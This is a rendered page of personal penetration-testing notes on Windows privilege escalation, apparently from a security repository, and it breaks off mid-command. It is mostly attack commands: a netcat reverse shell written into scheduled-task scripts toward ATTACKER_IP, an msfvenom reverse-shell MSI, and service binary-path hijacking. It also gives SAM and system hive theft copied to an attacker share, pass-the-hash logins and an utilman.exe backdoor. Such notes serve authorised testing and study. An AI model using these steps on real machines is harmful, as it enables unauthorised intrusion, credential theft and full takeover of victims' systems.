stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/post exploitation/priv_esc/docs/windows/windows_priv_esc.html

784 lines
60 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
init
2022-09-02 09:05:59 +02:00
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
Added settings.toml
2022-09-09 15:41:05 +02:00
<title>The Real Hugo</title>
init
2022-09-02 09:05:59 +02:00
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
Added settings.toml
2022-09-09 15:41:05 +02:00
<a href="/" style="text-decoration:none">Husk</a>
init
2022-09-02 09:05:59 +02:00
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
init
2022-09-02 09:05:59 +02:00
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#windows-privilege-escalation">Windows Privilege Escalation</a><ul>
<li><a href="#links">Links</a></li>
<li><a href="#account-types">Account Types</a></li>
<li><a href="#enumeration">Enumeration</a><ul>
<li><a href="#users-groups">Users &amp; Groups</a></li>
<li><a href="#files">Files</a></li>
<li><a href="#system">System</a></li>
Added settings.toml
2022-09-09 15:41:05 +02:00
<li><a href="#logfiles-and-registry">Logfiles and Registry</a></li>
<li><a href="#ad-credentials">AD Credentials</a><ul>
<li><a href="#ntds">NTDS</a></li>
</ul>
</li>
init
2022-09-02 09:05:59 +02:00
</ul>
</li>
<li><a href="#exploit">Exploit</a><ul>
<li><a href="#dll-hijacking">DLL Hijacking</a></li>
<li><a href="#unquoted-service-path">Unquoted Service Path</a></li>
<li><a href="#token-impersonation">Token Impersonation</a></li>
<li><a href="#schedules-tasks">Schedules Tasks</a></li>
<li><a href="#msi-elevated-installer">MSI Elevated Installer</a></li>
<li><a href="#accesschk64-permissions">accesschk64 Permissions</a><ul>
<li><a href="#accesschk64-for-services">accesschk64 for Services</a></li>
</ul>
</li>
<li><a href="#startup-application">Startup Application</a></li>
<li><a href="#password-mining">Password Mining</a></li>
<li><a href="#unattended-windows-installation">Unattended Windows Installation</a></li>
<li><a href="#powershell-history-file">Powershell History file</a></li>
<li><a href="#internet-information-services-iis">Internet Information Services (IIS)</a></li>
<li><a href="#putty">Putty</a></li>
<li><a href="#schtask-and-icacls">schtask and icacls</a></li>
<li><a href="#always-installs-elevated">Always Installs Elevated</a></li>
<li><a href="#service-misconfiguration">Service Misconfiguration</a></li>
<li><a href="#unquoted-service-path_1">Unquoted Service Path</a></li>
<li><a href="#permissions">Permissions</a><ul>
<li><a href="#sebackup-restore">SeBackup / Restore</a></li>
<li><a href="#setakeownership">SeTakeOwnership</a></li>
<li><a href="#seimpersonate-seassignprimarytoken">SeImpersonate / SeAssignPrimaryToken</a></li>
</ul>
</li>
Added settings.toml
2022-09-09 15:41:05 +02:00
<li><a href="#volume-shadow-copy-service">Volume Shadow Copy Service</a></li>
<li><a href="#dump-lsass">Dump LSASS</a></li>
<li><a href="#lsass-protection">LSASS Protection</a></li>
<li><a href="#windows-credential-manager">Windows Credential Manager</a></li>
<li><a href="#ntdsutil">Ntdsutil</a><ul>
<li><a href="#locally-extracting-ntdsdit">Locally extracting ntds.dit</a></li>
<li><a href="#remotely-dumping-ntds">Remotely dumping ntds</a></li>
</ul>
</li>
<li><a href="#local-administration-password-solution-laps">Local Administration Password Solution (LAPS)</a><ul>
<li><a href="#group-policy-preferences">Group Policy Preferences</a></li>
</ul>
</li>
<li><a href="#kerberoasting">Kerberoasting</a></li>
<li><a href="#as-rep-roasting">AS-REP Roasting</a></li>
init
2022-09-02 09:05:59 +02:00
</ul>
</li>
</ul>
</li>
</ul>
</div>
<h1 id="windows-privilege-escalation">Windows Privilege Escalation</h1>
<h2 id="links">Links</h2>
<ul>
<li><a href="https://www.fuzzysecurity.com/tutorials/16.html">Fundamentals</a></li>
<li><a href="https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp">PowerShellEmpire</a></li>
<li><a href="https://github.com/411Hall/JAWS">JAWS</a></li>
<li><a href="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS">winpeas</a></li>
<li><a href="https://github.com/itm4n/PrivescCheck">privescheck</a></li>
<li><a href="https://github.com/bitsadmin/wesng">windows exploit suggester</a></li>
<li><a href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation">hacktricks</a></li>
</ul>
<h2 id="account-types">Account Types</h2>
<ul>
<li><strong>Administrator</strong> local &amp; domain</li>
<li><strong>Standard</strong> local &amp; domain</li>
<li><strong>Guest</strong></li>
<li><strong>System</strong>, local system, final escalation</li>
<li><strong>Local Service</strong>, got anonymous connections over network.</li>
<li><strong>Network Service</strong>, default service account, authentication via network</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<h3 id="users-groups">Users &amp; Groups</h3>
<div class="codehilite"><pre><span></span><code>whoami /priv
net users
net users &lt;username&gt;
net localgroup
net localgroup &lt;groupname&gt;
query session
qwinsta
</code></pre></div>
<h3 id="files">Files</h3>
<ul>
<li><a href="../../../../enumeration/windows/powershell.md">powershell</a></li>
</ul>
<h3 id="system">System</h3>
<div class="codehilite"><pre><span></span><code>hostname
systeminfo <span class="p">|</span> findstr /B /C:<span class="s2">&quot;OS Name&quot;</span> /C:<span class="s2">&quot;OS Version&quot;</span>
</code></pre></div>
<ul>
<li>Installed software, check for existing exploits</li>
</ul>
<div class="codehilite"><pre><span></span><code>wmic product get name,version,vendor
</code></pre></div>
<ul>
<li>Services</li>
</ul>
<div class="codehilite"><pre><span></span><code>wmic service list brief <span class="p">|</span> findstr <span class="s2">&quot;Running&quot;</span>
</code></pre></div>
Added settings.toml
2022-09-09 15:41:05 +02:00
<h3 id="logfiles-and-registry">Logfiles and Registry</h3>
<div class="codehilite"><pre><span></span><code>cmdkey /list
</code></pre></div>
<ul>
<li>Keys containing passwords</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="kt">reg</span><span class="w"> </span><span class="n">query</span><span class="w"> </span><span class="n">HKLM</span><span class="w"> </span><span class="o">/</span><span class="n">f</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="o">/</span><span class="n">t</span><span class="w"> </span><span class="n">REG_SZ</span><span class="w"> </span><span class="o">/</span><span class="n">s</span><span class="w"></span>
<span class="kt">reg</span><span class="w"> </span><span class="n">query</span><span class="w"> </span><span class="n">HKCU</span><span class="w"> </span><span class="o">/</span><span class="n">f</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="o">/</span><span class="n">t</span><span class="w"> </span><span class="n">REG_SZ</span><span class="w"> </span><span class="o">/</span><span class="n">s</span><span class="w"></span>
</code></pre></div>
<h3 id="ad-credentials">AD Credentials</h3>
<ul>
<li>Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain)</li>
</ul>
<div class="codehilite"><pre><span></span><code>Get-ADUser -Filter * -Properties * <span class="p">|</span> <span class="k">select</span> Name,SamAccountName,Description
</code></pre></div>
<h4 id="ntds">NTDS</h4>
<ul>
<li>Check user description of AD users</li>
<li>NTDS consists of three tables<ul>
<li>Schema</li>
<li>Link</li>
<li>Data type</li>
</ul>
</li>
<li>Located under <code>C:\Windows\NTDS</code></li>
<li>File is locked by AD at runtime</li>
<li>A System Bootkey is need to dump the NTDS</li>
</ul>
init
2022-09-02 09:05:59 +02:00
<h2 id="exploit">Exploit</h2>
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul>
<li><strong>Use found credentials</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code>runas /savecred /user:&lt;domain<span class="se">\u</span>ser&gt; reverse_shell.exe
</code></pre></div>
init
2022-09-02 09:05:59 +02:00
<h3 id="dll-hijacking">DLL Hijacking</h3>
<ul>
<li><a href="../../../../exploit/windows/dll_hijacking/dll_hijacking.md">DLL hijacking</a></li>
</ul>
<h3 id="unquoted-service-path">Unquoted Service Path</h3>
<ul>
<li><a href="../../../../exploit/windows/docs/unquoted_path.md">unquoted service path</a></li>
</ul>
<h3 id="token-impersonation">Token Impersonation</h3>
<ul>
<li><code>SeImpersonatePrivilege</code> is necessary, check via <code>whoami priv</code></li>
<li>Hot Potato is best before Server 2019 and Windows 10 (version 1809)</li>
<li><a href="../../../../exploit/windows/docs/potatoes.md">Potatos</a></li>
<li><a href="https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/">itm4n</a></li>
</ul>
<h3 id="schedules-tasks">Schedules Tasks</h3>
<ul>
<li><code>schtasks</code> and <code>schtasks /query /tn %TASK_NAME% /fo list /v</code></li>
<li><code>Autoruns64.exe</code></li>
</ul>
<h3 id="msi-elevated-installer">MSI Elevated Installer</h3>
<ul>
<li><a href="../../../../exploit/windows/docs/always_installed_elevated.md">Always install elevated</a></li>
</ul>
<h3 id="accesschk64-permissions">accesschk64 Permissions</h3>
<ul>
<li>Check access to files and folders</li>
</ul>
<div class="codehilite"><pre><span></span><code>accesschk64 -wvu <span class="s2">&quot;file.exe&quot;</span>
</code></pre></div>
<ul>
<li>If permission <code>SERVICE_CHANGE_CONFIG</code> is set</li>
</ul>
<div class="codehilite"><pre><span></span><code> sc config &lt;service&gt; <span class="nv">binpath</span><span class="o">=</span><span class="s2">&quot;net localgroup administrators user /add&quot;</span>
</code></pre></div>
<ul>
<li><a href="../../../../exploit/windows/service_escalation/service_escalation.md">Service escalation</a></li>
<li>Any other binary works as well. Copy the compiled portable executable from the <code>service_escalation</code> onto the binary path.Restart the service afterwards.</li>
</ul>
<h4 id="accesschk64-for-services">accesschk64 for Services</h4>
<div class="codehilite"><pre><span></span><code>accesschk64 -qlc <span class="s2">&quot;service.exe&quot;</span>
</code></pre></div>
<ul>
<li>If permission <code>SERVICE_ALL_ACCESS</code> is set it is configurable upload a reverse shell</li>
</ul>
<div class="codehilite"><pre><span></span><code>icacls C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\s</span>hell.exe /grant Everyone:F
</code></pre></div>
<ul>
<li>Reconfigure and restart service</li>
</ul>
<div class="codehilite"><pre><span></span><code>sc config TheService <span class="nv">binPath</span><span class="o">=</span> <span class="s2">&quot;C:\Path\to\shell.exe&quot;</span> <span class="nv">obj</span><span class="o">=</span> LocalSystem
sc stop TheService
sc start TheService
</code></pre></div>
<h3 id="startup-application">Startup Application</h3>
<ul>
<li>Put reverse shell instead of an executable inside <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup</code> </li>
</ul>
<h3 id="password-mining">Password Mining</h3>
<ul>
<li>Set up metasploit</li>
</ul>
<div class="codehilite"><pre><span></span><code>use auxiliary/server/capture/http_basic
<span class="nb">set</span> srvport <span class="m">7777</span>
<span class="nb">set</span> uripath pass
</code></pre></div>
<ul>
<li>Visit site on target</li>
</ul>
<h3 id="unattended-windows-installation">Unattended Windows Installation</h3>
<ul>
<li>Investigate the following paths to potentially find user credentials</li>
</ul>
<div class="codehilite"><pre><span></span><code>C:<span class="se">\U</span>nattend.xml
C:<span class="se">\W</span>indows<span class="se">\P</span>anther<span class="se">\U</span>nattend.xml
C:<span class="se">\W</span>indows<span class="se">\P</span>anther<span class="se">\U</span>nattend<span class="se">\U</span>nattend.xml
C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>ysprep.inf
C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>ysprep<span class="se">\s</span>ysprep.xml
</code></pre></div>
<ul>
<li>Watch out for the <code>&lt;Credentials&gt;</code> tags</li>
</ul>
<h3 id="powershell-history-file">Powershell History file</h3>
<div class="codehilite"><pre><span></span><code>Get-Content %userprofile%<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\P</span>owerShell<span class="se">\P</span>SReadline<span class="se">\C</span>onsoleHost_history.txt
</code></pre></div>
<h3 id="internet-information-services-iis">Internet Information Services (IIS)</h3>
<ul>
<li>Default web server on windows</li>
<li>Paths containing credentials are the following</li>
</ul>
<div class="codehilite"><pre><span></span><code>C:<span class="se">\i</span>netpub<span class="se">\w</span>wwroot<span class="se">\w</span>eb.config
C:<span class="se">\W</span>indows<span class="se">\M</span>icrosoft.NET<span class="se">\F</span>ramework64<span class="se">\v</span><span class="m">4</span>.0.30319<span class="se">\C</span>onfig<span class="se">\w</span>eb.config
</code></pre></div>
<h3 id="putty">Putty</h3>
<ul>
<li>Saved proxy password credentials may be found via</li>
</ul>
<div class="codehilite"><pre><span></span><code>reg query HKEY_CURRENT_USER<span class="se">\S</span>oftware<span class="se">\S</span>imonTatham<span class="se">\P</span>uTTY<span class="se">\S</span>essions<span class="se">\ </span>/f <span class="s2">&quot;ProxyPassword&quot;</span> /s
</code></pre></div>
<h3 id="schtask-and-icacls">schtask and icacls</h3>
<ul>
<li>Check <code>schtasks /query /tn %TASK_NAME% /fo list /v</code></li>
<li>Check script for scheduled tasks, <code>F</code> means full access</li>
</ul>
<div class="codehilite"><pre><span></span><code>icacls &lt;PathToScript&gt;
</code></pre></div>
<ul>
<li>Put payload inside the script</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nb">echo</span> <span class="s2">&quot;C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span> &gt; &lt;PathToSript&gt;
</code></pre></div>
<ul>
<li>Run the task</li>
</ul>
<div class="codehilite"><pre><span></span><code>schtasks /run /tn &lt;taskname&gt;
</code></pre></div>
<h3 id="always-installs-elevated">Always Installs Elevated</h3>
<ul>
<li>These should be set</li>
</ul>
<div class="codehilite"><pre><span></span><code>C:<span class="se">\&gt;</span> reg query HKCU<span class="se">\S</span>OFTWARE<span class="se">\P</span>olicies<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\I</span>nstaller
C:<span class="se">\&gt;</span> reg query HKLM<span class="se">\S</span>OFTWARE<span class="se">\P</span>olicies<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\I</span>nstaller
</code></pre></div>
<ul>
<li>Craft <code>*.msi</code> file with a payload</li>
</ul>
<div class="codehilite"><pre><span></span><code>msfvenom -p windows/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span><span class="nv">$ATTACKER_IP</span> <span class="nv">LPORT</span><span class="o">=</span><span class="nv">$ATTACKER_PORT</span> -f msi -o wizard.msi
</code></pre></div>
<ul>
<li>Upload and execute via</li>
</ul>
<div class="codehilite"><pre><span></span><code>msiexec /quiet /qn /i C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\w</span>izard.msi
</code></pre></div>
<h3 id="service-misconfiguration">Service Misconfiguration</h3>
<ul>
<li>Check services, watch out for <code>BINARY_PATH_NAME</code> and <code>SERVICE_START_NAME</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>sc qc apphostsvc
</code></pre></div>
<ul>
<li>Check found permissions via</li>
</ul>
<div class="codehilite"><pre><span></span><code>icacls &lt;BINARY_PATH_NAME&gt;
</code></pre></div>
<ul>
<li>If the service binary path is writeable move the payload to its path and grant permissions</li>
</ul>
<div class="codehilite"><pre><span></span><code>icacls &lt;Payload_Service.exe&gt; /grant Everyone:F
</code></pre></div>
<div class="codehilite"><pre><span></span><code>sc stop &lt;service&gt;
sc start &lt;service&gt;
</code></pre></div>
<ul>
<li>Catch the reverse shell service</li>
</ul>
<p>Others ways are:
* Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
* All services are stored under <code>HKLM\SYSTEM\CurrentControlSet\Services\</code></p>
<h3 id="unquoted-service-path_1">Unquoted Service Path</h3>
<ul>
<li>If <code>BINARY_PATH_NAME</code> spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.</li>
<li>A created directory at install time inherits the permissions from its parent. Check it via</li>
</ul>
<div class="codehilite"><pre><span></span><code>icacls &lt;directory&gt;
</code></pre></div>
<ul>
<li>Use <code>service-exe</code> payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path</li>
<li>Set permissions</li>
</ul>
<div class="codehilite"><pre><span></span><code>icacls C:<span class="se">\P</span>ath/to/service.exe /grant Everyone:F
</code></pre></div>
<h3 id="permissions">Permissions</h3>
<ul>
<li><a href="https://github.com/gtworek/Priv2Admin">priv2admin</a></li>
<li><code>whoami /priv</code></li>
</ul>
<h4 id="sebackup-restore">SeBackup / Restore</h4>
<ul>
<li>If <code>SeBackup / SeRestore</code> (rw on all files) is set an elevated <code>cmd.exe</code> may be opened</li>
<li>Download <code>SAM</code> and <code>System</code> hashes</li>
</ul>
<div class="codehilite"><pre><span></span><code>reg save hklm<span class="se">\s</span>ystem C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\s</span>ystem.hive
reg save hklm<span class="se">\s</span>am C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\s</span>am.hive
</code></pre></div>
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul>
<li>or</li>
</ul>
<div class="codehilite"><pre><span></span><code>copy C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>onfig<span class="se">\s</span>am <span class="se">\\</span>ATTACKER_IP<span class="se">\</span>
</code></pre></div>
init
2022-09-02 09:05:59 +02:00
<ul>
<li>Start smb server on attack machine</li>
</ul>
<div class="codehilite"><pre><span></span><code>copy C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\s</span>am.hive <span class="se">\\</span>ATTACKER_IP<span class="se">\</span>
copy C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\s</span>ystem.hive <span class="se">\\</span>ATTACKER_IP<span class="se">\</span>
</code></pre></div>
<ul>
<li>Dump the hashes</li>
</ul>
<div class="codehilite"><pre><span></span><code>secretsdump.py -sam sam.hive -system system.hive LOCAL
</code></pre></div>
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul>
<li>or meterpreter on target</li>
</ul>
<div class="codehilite"><pre><span></span><code>hashdump
</code></pre></div>
init
2022-09-02 09:05:59 +02:00
<ul>
<li>Use pass the hash to login </li>
</ul>
<div class="codehilite"><pre><span></span><code>psexec.py -hashes &lt;hash&gt; administrator@<span class="nv">$TARGET_IP</span>
</code></pre></div>
<h4 id="setakeownership">SeTakeOwnership</h4>
<ul>
<li>If <code>SeTakeOwnership</code> is set one can take ownership of every file or service.</li>
</ul>
<div class="codehilite"><pre><span></span><code>takeown /f C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\U</span>tilman.exe
icacls C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\U</span>tilman.exe /grant &lt;user&gt;:F
copy cmd.exe utilman.exe
</code></pre></div>
<ul>
<li>Log out, on the Login screen click on <code>Ease of Access</code></li>
</ul>
<h4 id="seimpersonate-seassignprimarytoken">SeImpersonate / SeAssignPrimaryToken</h4>
<ul>
<li>It is a rouge potato</li>
<li>Execute process as another user</li>
<li>Service accounts operate through impersonation</li>
<li>Check privileges via <code>whoami /priv</code> for these </li>
<li><strong>Object Exporter Identifier (OXID)</strong> is executed as via DCOM as a resolver on port 135 to socket of attacker</li>
</ul>
<div class="codehilite"><pre><span></span><code>socat tcp-listen:135 reuseaddr,fork tcp:<span class="nv">$TARGET_IP</span>:1234
</code></pre></div>
<ul>
<li>Catch the potatoe executable from target via netcat</li>
</ul>
Added settings.toml
2022-09-09 15:41:05 +02:00
<h3 id="volume-shadow-copy-service">Volume Shadow Copy Service</h3>
<ul>
<li>Take a look at the volumes at</li>
</ul>
<div class="codehilite"><pre><span></span><code>vssadmin list shadows
</code></pre></div>
<ul>
<li>Copy <code>sam</code> and <code>system</code> from the shadow copy</li>
</ul>
<div class="codehilite"><pre><span></span><code>copy <span class="se">\\</span>?<span class="se">\G</span>LOBALROOT<span class="se">\D</span>evice<span class="se">\H</span>arddiskVolumeShadowCopy1<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\c</span>onfig<span class="se">\s</span>am <span class="se">\\</span>ATTACKER_IP<span class="se">\</span>
